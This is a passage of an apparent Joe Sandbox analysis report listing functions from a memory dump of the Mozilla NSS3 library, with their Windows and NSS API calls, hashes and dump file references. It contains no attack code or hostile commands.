                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3801a7c9e6de2dedfda050956222e50ce240fbdf418479a6df863023b814300c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54316DB5A006158FCB00EF79C18582ABBF4FF09354F158A6AEC9987311EB34E891CBD1
                                                                                                                                                                                                                                                            Function 6BEA9AC0 Relevance: 12.1, APIs: 8, Instructions: 76networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • socket.WSOCK32(?,00000017,6BEA99BE), ref: 6BEA9AE6
                                                                                                                                                                                                                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6BEA99BE), ref: 6BEA9AFC
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(?,00000017,6BEA99BE), ref: 6BEA9B26
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,8004667E,00000001,?,00000017,6BEA99BE), ref: 6BEA9B36
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE896,00000000,00000000,8004667E,00000001,?,00000017,6BEA99BE), ref: 6BEA9B41
                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000,00000017,6BEA99BE), ref: 6BEA9B4A
                                                                                                                                                                                                                                                            • #7.WSOCK32(00000000,0000FFFF,00001002,6BEA99BE,00000017,00000000,8004667E,00000001,?,00000017,6BEA99BE), ref: 6BEA9B6D
                                                                                                                                                                                                                                                            • #21.WSOCK32(00000000,0000FFFF,00001002,6BEA99BE,00000017,00000000,0000FFFF,00001002,6BEA99BE,00000017,00000000,8004667E,00000001,?,00000017), ref: 6BEA9B92
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$Last$closesocketioctlsocketsocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 312597714-0
                                                                                                                                                                                                                                                            • Opcode ID: 347cd03e445282580d0adc65b6b0da77173b79611545309af1d886aca6c49d67
                                                                                                                                                                                                                                                            • Instruction ID: c32cce412d60457cdbbfa3556cbdfbcca42bb3d72570708368facdf41884ec8f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 347cd03e445282580d0adc65b6b0da77173b79611545309af1d886aca6c49d67
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F21F675A001066AEB209B74CC02ABFB77CDF45318F640125E810AB2D1EB7D591582E6
                                                                                                                                                                                                                                                            Function 6BEDCB60 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,?,00000000,?,00000000,?,6BEE57DF,00000000,?,00000002,6BEE5840,?), ref: 6BEDCBB5
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,6BEE57DF,00000000,?,00000002,6BEE5840,?), ref: 6BEDCC4A
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,?,00000000,?,00000000,?,6BEE57DF,00000000,?,00000002,6BEE5840), ref: 6BEDCC5E
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6BEDCC98
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BEDCD50
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Unlock$CriticalEnterErrorSectionValue
                                                                                                                                                                                                                                                            • String ID: @Xk
                                                                                                                                                                                                                                                            • API String ID: 1974170392-2112663459
                                                                                                                                                                                                                                                            • Opcode ID: c9a0ecf88ad77f220f3f1652bcb8413ca9254509bba6806ff6a5418c593e7a4f
                                                                                                                                                                                                                                                            • Instruction ID: b239dcd48f2db8da18492797a356f6b3d566672153665cc7e0a130523c20aa99
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9a0ecf88ad77f220f3f1652bcb8413ca9254509bba6806ff6a5418c593e7a4f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F919276F002189FDB00CFA8D881A9EBBB5BF49358F250169ED05EB311D779E852CB91
                                                                                                                                                                                                                                                            Function 6BEB3A80 Relevance: 10.7, APIs: 7, Instructions: 201timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?), ref: 6BEB3AB1
                                                                                                                                                                                                                                                            • PR_NormalizeTime.NSS3(?,?), ref: 6BEB3B12
                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6BEB3BF0
                                                                                                                                                                                                                                                            • _localtime64_s.API-MS-WIN-CRT-TIME-L1-1-0(?,?,000F423F,?,000F4240,00000000), ref: 6BEB3C25
                                                                                                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BEB3CA7
                                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 6BEB3CCB
                                                                                                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BEB3CDB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __aulldiv_errno_localtime64_s$NormalizeTime
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3963911192-0
                                                                                                                                                                                                                                                            • Opcode ID: e424c2c96d6867a41a23151d4e9b2bdd87e240faaa3c6dec7449ff419e03238a
                                                                                                                                                                                                                                                            • Instruction ID: 308ea9201c0444ed791e30c2cd5e32fbef168d1432f7a7606e854a842daabad3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e424c2c96d6867a41a23151d4e9b2bdd87e240faaa3c6dec7449ff419e03238a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E71E272B046049FC718CF78CD8265AB7E6AFC8304F198A2DE945DB791E778E9058B80
                                                                                                                                                                                                                                                            Function 6BF329E0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE002,00000000,00000000,00000000,?,?,6BF321DD,00000000), ref: 6BF32A47
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeInteger_Util.NSS3(?,6BF321DD,00000002,00000000,00000000,?,?,6BF321DD,00000000), ref: 6BF32A60
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000,?,?,?,?,00000000,00000000,?,?,6BF321DD,00000000), ref: 6BF32A8E
                                                                                                                                                                                                                                                            • PK11_KeyGen.NSS3(00000000,?,00000000,83F089CA,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BF32AE9
                                                                                                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(00000000), ref: 6BF32B0D
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6BF32B7B
                                                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?), ref: 6BF32BD6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1625981074-0
                                                                                                                                                                                                                                                            • Opcode ID: 80fa99d20266a64f61fdcb988b04bfafde5e4a1a61507e79280ff6947774d187
                                                                                                                                                                                                                                                            • Instruction ID: 8f5e02ec38f9582a8e6d0f40457cef90ad87b93733d43288fcbd16c75e4cbe86
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80fa99d20266a64f61fdcb988b04bfafde5e4a1a61507e79280ff6947774d187
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8751C773E002169BEB10CE79DC81B6A77B5AF44318F140168ED19AB2B1E73EE915C7D1
                                                                                                                                                                                                                                                            Function 6BF18B60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BF18B93
                                                                                                                                                                                                                                                            • PL_strncasecmp.NSS3(?,OID.,00000004), ref: 6BF18BAA
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6BF18D28
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BF18D44
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6BF18D72
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CopyErrorItem_L_strncasecmpUtilmemcpystrlen
                                                                                                                                                                                                                                                            • String ID: OID.
                                                                                                                                                                                                                                                            • API String ID: 4247295491-3585844982
                                                                                                                                                                                                                                                            • Opcode ID: 06e81a324d5933465dd0b8ca74022f16ad8dc75b3d8602e49c63cc374ef91bdd
                                                                                                                                                                                                                                                            • Instruction ID: 731b2f604985f4baa97294189ee3bfc8bef2f36d2277f3f692ebbf03eb1802d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06e81a324d5933465dd0b8ca74022f16ad8dc75b3d8602e49c63cc374ef91bdd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5513AF3F092254BCB20CA18CD8079AB3B4EB55344F0449F9E91ADB3A1D3389D818F94
                                                                                                                                                                                                                                                            Function 6BED6980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BED5DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BED5DEC
                                                                                                                                                                                                                                                              • Part of subcall function 6BED5DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6BED5E0F
                                                                                                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BED69BA
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6BEC9003,?), ref: 6BF1FD91
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FD80: PORT_Alloc_Util.NSS3(A4686BF2,?), ref: 6BF1FDA2
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686BF2,?,?), ref: 6BF1FDC4
                                                                                                                                                                                                                                                            • VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BED6A59
                                                                                                                                                                                                                                                            • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BED6AB7
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BED6ACA
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BED6AE0
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BED6AE9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2730469119-0
                                                                                                                                                                                                                                                            • Opcode ID: b9fa20a858206e6370f345c9f8830032ceb709b17a3afb01b7e3ef961e65484d
                                                                                                                                                                                                                                                            • Instruction ID: 99be84c1b1964fc1ddc2ee57187f8fa8e54f235ac63c12f71e00a23ad02bdf8d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9fa20a858206e6370f345c9f8830032ceb709b17a3afb01b7e3ef961e65484d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B94173716006019FDB10DF74EC45B9777E9BF44354F148438E89987350EF79E91287A1
                                                                                                                                                                                                                                                            Function 6BEC2920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BEC294E
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6BEC1D97,?,?), ref: 6BF21836
                                                                                                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BEC296A
                                                                                                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BEC2991
                                                                                                                                                                                                                                                              • Part of subcall function 6BF21820: PR_SetError.NSS3(FFFFE005,00000000,?,6BEC1D97,?,?), ref: 6BF2184D
                                                                                                                                                                                                                                                            • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6BEC29AF
                                                                                                                                                                                                                                                            • PR_Now.NSS3 ref: 6BEC2A29
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BEC2A50
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BEC2A79
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2509447271-0
                                                                                                                                                                                                                                                            • Opcode ID: 733e83b6022280515ace95b6990e3631065813c248b96a42ebef9948f30468bc
                                                                                                                                                                                                                                                            • Instruction ID: c15152fc19dcf32882fa7fb725e74d372c22a8c26ee730a0070fb893a166b82c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 733e83b6022280515ace95b6990e3631065813c248b96a42ebef9948f30468bc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97419172A083519FC714CE78C980A4FB7E5ABD8758F14992DF8AC93314E734E9098B93
                                                                                                                                                                                                                                                            Function 6BECBA90 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000800,6BF53CAF,?), ref: 6BECBABF
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6BF53CAF,?), ref: 6BECBAD5
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6BF53CAF,?), ref: 6BECBB08
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6BF53CAF,?), ref: 6BECBB1A
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6BF53CAF,?), ref: 6BECBB3B
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,6BF53CAF,?), ref: 6BECBB5F
                                                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6BF53CAF,?), ref: 6BECBB75
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Alloc_ArenaArena_$CopyErrorFreeItem_memset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3944093909-0
                                                                                                                                                                                                                                                            • Opcode ID: 8f20564b91dae92ad9def858f6634b738a4cbe907818951d4c420d8c6c739663
                                                                                                                                                                                                                                                            • Instruction ID: 1836ee5638e0094099fedb43207c38fc5d03d074649953ff982344b4d4a7b416
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f20564b91dae92ad9def858f6634b738a4cbe907818951d4c420d8c6c739663
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67210972E001199BEB008B79DE81F2B77A9EF80358F254079E92CE7394D7359D14C7A6
                                                                                                                                                                                                                                                            Function 6BF1FBD0 Relevance: 10.6, APIs: 7, Instructions: 87memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6BF1FC12
                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6BF1FC2B
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6BF1FC44
                                                                                                                                                                                                                                                            • realloc.MOZGLUE(?,?), ref: 6BF1FC54
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF1FC68
                                                                                                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(?,?,?,?), ref: 6BF1FC76
                                                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6BF1FC81
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Alloc_ArenaError$Grow_freerealloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1441890768-0
                                                                                                                                                                                                                                                            • Opcode ID: 39638d30341e7bcc9d1fac03361e1634a590f1697d3b4d8bb3742b0b21f9ba61
                                                                                                                                                                                                                                                            • Instruction ID: ecabba12f9c7b8350887df1a234493ba57f8d9ed26f18d092fe3af513b5aab6f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39638d30341e7bcc9d1fac03361e1634a590f1697d3b4d8bb3742b0b21f9ba61
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 652108B7B0C71267FB504EA9DD81B16B29CBF44B8CF104939ED1983620E73DE610A6E1
                                                                                                                                                                                                                                                            Function 6BF18970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,00000000,6BEC61C4,?,6BEC5639,00000000), ref: 6BF18991
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6BEC5639,00000000), ref: 6BF189AD
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6BEC5639,00000000), ref: 6BF189C6
